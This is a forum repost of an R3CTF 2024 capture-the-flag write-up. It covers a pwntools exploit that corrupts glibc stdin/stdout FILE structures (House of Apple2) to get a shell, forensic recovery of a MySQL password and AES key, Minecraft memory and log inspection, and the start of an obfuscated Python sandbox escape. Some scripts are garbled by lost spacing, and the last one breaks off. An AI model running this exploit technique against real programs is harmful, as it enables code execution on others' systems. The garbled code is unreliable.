Jump to content

Title: R3CTF2024 WP

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

1. PWN

1.Nullulllllu

When directly giving libc_base, write \x00 at any address at once.

Directly modify the end of _IO_buf_base of IO_2_1_stdin is \x00, then _IO_buf_base will point to _IO_write_base of IO_2_1_stdin. Next, use the getchar function to trigger the write operation to modify IO_buf_base to IO_2_1_stdout, and use the getchar function to trigger the write operation to write apple2 into stdout. The printf function will trigger the appl2 get shell.

exp

from pwn import *

from struct import pack

from ctypes import *

import base64

from subprocess import run

#from LibcSearcher import *

from struct import pack

import tty

def debug(c=0):

if(c):

gdb.attach(p, c)

else:

gdb.attach(p)

pause()

def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))

#-----------------------------------------------------------------------------------------

s=lambda data : p.send(data)

sa=lambda text,data :p.sendafter(text, data)

sl=lambda data :p.sendline(data)

sla=lambda text,data :p.sendlineafter(text, data)

r=lambda num=4096 :p.recv(num)

rl=lambda text :p.recvuntil(text)

pr=lambda num=4096 :print(p.recv(num))

inter=lambda :p.interactive()

l32=lambda :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))

l64=lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))

uu32=lambda :u32(p.recv(4).ljust(4,b'\x00'))

uu64=lambda :u64(p.recv(6).ljust(8,b'\x00'))

int16=lambda data :int(data,16)

lg=lambda s, num :p.success('%s -0x%x' % (s, num))

#-----------------------------------------------------------------------------------------

context(os='linux', arch='amd64', log_level='debug')

p=remote('ctf2024-entry.r3kapig.com', 30371)

#p=remote('127.0.0.1', 9999)

elf_patch='./chall'

#p=process(elf_patch)

elf=ELF(elf_patch)

libc=ELF('./libc.so.6')

sla(b' ', b'1')

rl(b'0x')

libc_base=int(r(12), 16)# +0x6d80

environment=libc_base + libc.sym['__environ']

system, binsh=get_sb()

stdin=libc_base + libc.sym['_IO_2_1_stdin_']

stdin_IO_buf_base=stdin + 7*8

stdin_old_value=stdin +0x83

stdout=libc_base + libc.sym['_IO_2_1_stdout_']

stderr=libc_base + libc.sym['_IO_2_1_stderr_']

# step 2 : printf - stdout - house of apple2

system, binsh=get_sb()

_IO_wfile_jumps=libc_base +0x202228

base_addr=stdout

fake_io=b' sh;\x00\x00\x00'

fake_io=fake_io.ljust(0x68, b'\x00')

fake_io +=p64(system)

fake_io=fake_io.ljust(0x88, b'\x00')

fake_io +=p64(base_addr +0x5000) # _lock

fake_io +=p64(0)*2

fake_io +=p64(base_addr)

fake_io=fake_io.ljust(0xd8, b'\x00')

fake_io +=p64(_IO_wfile_jumps -0x20)

fake_io=fake_io.ljust(0xe0, b'\x00')

fake_io +=p64(base_addr)

sla(b' ', b'2')

sla(b'Mem: ', hex(stdin_IO_buf_base))

#debug('b *$rebase(0x12c3)')

sa(b' ', p64(stdin_old_value)*3 + p64(base_addr) + p64(base_addr + len(fake_io) + 1))

sleep(1)

sl(fake_io)

lg('libc_base', libc_base)

inter()

pause()

2. Forensic

1.TPA 01

e01 mirror thrown directly into the fire eye and analyze a nested evidence

1049983-20241005123634198-863951153.jpg

In fact, the analysis process was quite complicated when I was doing this question. I felt that I was too complicated. The reason was that I had too little experience. I even started to simulate it.

When flipping through the folder, find wsl and combine nested evidence. I feel that the expected solution should be to restore this system.

1049983-20241005123635438-1986591366.jpg But fortunately, there is an evidence collection tool. You can do it without recovering it. The following is another way I found out because I didn’t carefully search the file system.

010 Just dig out the ciphertext

1049983-20241005123636208-712348146.jpg

But you can see it directly in the fire eye and you can also see a prompt about the key.

1049983-20241005123636839-420522205.png

key:

Do you like watch videos on youtube?Something fun there:https://www.youtube.com/@d3f4u1t-lolol

F14G:

Hi players,welcome !Ops,what's that?2d422fc7f2c628c55520984c0673964eb5454dea72f79b1022a34728294c5bf8I guess u need a key to decrypt it.SELECT something FROM somewhere with the windows10 lol~

According to the prompt SELECT something FROM somewhere I think it should have something to do with SQL statements

Let's take a look at the video mentioned in the key first

1049983-20241005123637427-1989273656.jpg There is a string. Come and take a look

0x6d617962652075206e6565642c746861742773206e6f74206162736f6c7574650a726f6f743a5040357357307264466f7255

Maybe u need, that's not absolute

root:P@5sW0rdForU 1049983-20241005123638116-1629312263.png gave a password. Try to log in to mysql and log in successfully.

1049983-20241005123638719-878532988.png 1049983-20241005123639290-416150928.pngselect * from secret;1049983-20241005123640012-298815255.jpg 1049983-20241005123640629-927545123.jpg

FFD8's head, a glance, jpg picture, save, give AES decrypted key

In fact, you can also use a project ibd2sql to decrypt the database secret.ibd.1049983-20241005123641303-237871512.png 1049983-20241005123642062-415239806.jpg

2.TPA 02

Two parts: One is to find the attacker's mobile number, the other is to find Peggy's login password, first look at the traffic, directly track the tcp flow, in the 31st flow, find the login login page

image-20240611170304555

The first flag is found from the place where the Android phone stores the SMS message

image-20240611170358276

Look at the given mobile phone folder. Use Fire Eye to analyze the two mobile phone numbers.

1049983-20241005123644087-129601060.png According to the context, you can know that the number is 15555215556, which should be Peggy's colleagues. Come and ask if Peggy has also received the phishing information.

Then the 15555215558 below should be the attacker's mobile phone number. It is directly combined.

r3ctf{15555215558_l0v3_aNd_peace}

III. Misc

1.Blizzard CN Restarts

Using shadoweditor

1049983-20241005123644830-198434124.jpg

image-20240611170732676

image-20240611170748000

2.hideAndSeek

Ben is a superpower who loves playing hide and seek. He can teleport to anywhere to no one can find him, but he seems unaware that his ability only works within a certain range

Rules:

The adorable Ben will only appear within the range of (0, -50, 0) to (128, 50, 128).

Ben will every 10 seconds and reappear in a new location after 10 seconds.

A 'newtp' has been added for all players to teleport to any coordinates.

Connect info: 34.81.163.238

Version 1.19.2 is very abstract mc game question. At the beginning, I really used PCL2 emulator to enter the game to play

image-20240611194137010

I saw that I gave a newtp command and I also checked many tutorials to learn how to use MC's tp command, but I found it useless. I walked around the map for a while.

Use newtp to transmit some coordinates. The command format is as follows

The coordinates to be transmitted (x, y, z)

Newtp x y z directly flips the log log file and find flag

image-20240611194432924

Read the log and you will find that the body type of "Ben" should be a villager, and his name is flag

R3CTF{Jus7_play_m0r3_h1de_2nd_seek_w1th_Ben}

3.Transit

1049983-20241005123648414-1514241253.jpg

Search for the cover on the video on B station, which is highly similar to the shooting location. Find the pov along Line 19. The video BV1ie411M7av is the shooting location. Play it frame by frame and find it at 3:35. R3CTF{hangzhou_zhixing_road_station}

1049983-20241005123649086-1267414652.jpg

hint:S1611 and S1613 may the number of signal light, not the trains. https://www.cnblogs.com/QQ2962269558/p/12743383.html uses uplink (S) and downlink (X) to define the direction of the train. It may be an electric-driven EMU

4.Thief

If it is greater than 0.85, it is definitely 1:

frommpwnimport*

p=remote('ctf2024-entry.r3kapig.com',31395)

foriinrange(500):

a=p.recvuntil(b'top_10_pred:[')

b=p.recvuntil(b']')

b=b.decode().replace('[','').replace(']','').split(',')

c=float(b[0])

ifc=0.9:

p.sendlineafter(b'Isthispictureinthetrainingset?',b'1')

else:

p.sendlineafter(b'Isthispictureinthetrainingset?',b'0')

print(f'no.{i}={c},num={num}')

flag=p.recvline()

print(flag)

p.close() Of course, the scope can be changed reasonably

1049983-20241005123649655-2063342577.jpg

R3CTF{caIN_liKe_A1_4nd_rEC_8772b609d39f}

5.hideAndSeek

The cheating is in seconds

1049983-20241005123650262-888396391.jpg

Very good villagers, make my perspective + tracking rotation

6.h1de@ndSe3k

When MC renders a block, it will be logged to view the log in seconds.

1049983-20241005123650893-1618764647.jpg Use CE to check that there are many 'R3CTF', 'r3ctf', 'flag' in the java.exe process. It is speculated that the villagers' names are stored in plain text in memory. After running the picture,

1049983-20241005123651685-445066128.jpgP.S. After testing, it was found that only after loading the travel map (journeymap-1.19.2-5.9.8-fabric) can the villagers' names be found in memory. It is reasonable to record some creatures NBT on the travel map.

Or just blast the flag ()

1049983-20241005123652376-1919325320.jpg

7.behind the WALL

defcallback(re):

re=5

re=getattr(getattr(getattr('a',f'e{f'n'}c{f'o'}d{f'e'}')(),f'f{f'r'}o{f'm'}h{f'e'}x')(f'{re}f'),f'd{f'e'}c{f'o'}d{

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.